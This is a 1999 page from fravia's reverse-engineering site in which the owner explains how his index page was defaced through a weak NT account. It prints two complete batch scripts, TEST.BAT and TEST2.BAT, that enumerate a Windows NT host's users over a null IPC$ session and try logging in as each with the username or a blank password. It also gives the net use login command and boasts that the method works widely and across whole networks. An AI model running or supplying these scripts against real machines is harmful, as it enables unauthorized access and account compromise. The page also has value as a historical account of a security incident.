fravia's index page hacked on 1 October 1999
by fravia+
courtesy of fravia's pages of reverse engineering
(published at fravia's in October 1999)

Well, on 01 October 1999 sortof succeded in hacking my front page and substituted my index.htm with this page.
The hack was possible because my username/password combination (against better wisdom... "he does'nt practice what he's teaching" :-( were both 8 character long (an old tradition I am now completely ridden of :-)
In these cases you can succesfully attack a NT box using following scripts (courtesy of our NT-expert .sozni):

The hack wasn't as elegant as may seem. The attacker took a simple batch file .sozni wrote that tries to connect to an NT box using username/username then username/"".

The attacker just ran the following batch file on my host and it gave him a login. Then he just did this at a command prompt:

net use \\<your ip>\IPC$ /user:<username> <password>

in case you are interested, here is the text for sozni's 2 batch files (which requires another file: lsuser.exe to work properly):

====TEST.BAT====



@echo Connecting to \\%1...

@net use \\%1\IPC$ "" /user:""

@nbtstat -A %1 

@echo Retrieving list of users...

@lsuser -h\\%1 -n > %1.users

@echo Checking passwords...

@net use \\%1\IPC$ /delete

@FOR /F "skip=2" %%a IN (%1.users) DO @For %%b IN (%%a "") DO @(test2.bat %1 %%a %%b) 

@del /f %1.users



=====TEST2.BAT=======



@echo Trying to login using %2/%3

@echo *****%2/%3 

@net use \\%1\IPC$ /user:%2 %3 && Net use \\%1\IPC$ /delete 



=====================

You just run Test <ip> and it gets usernames and tries two passwords then moves on. Very simple but you wouldn't believe how many thousands of times this works (even on some very big companies).

.sozni usually combines this with a little util +greythorne wrote for him in oredr to scan a whole class C network.

Some better and more complete material can be found on some of the documents by Rhino9.

If you want to visit activeX wizard sozni's page, go ahead.


red

 


red

redhomepage red links red anonymity red+ORC redstudents' essays redacademy database redbots wars
redantismut redtools redcocktails redjavascript wars redsearch_forms redmail_fravia
redIs reverse engineering illegal?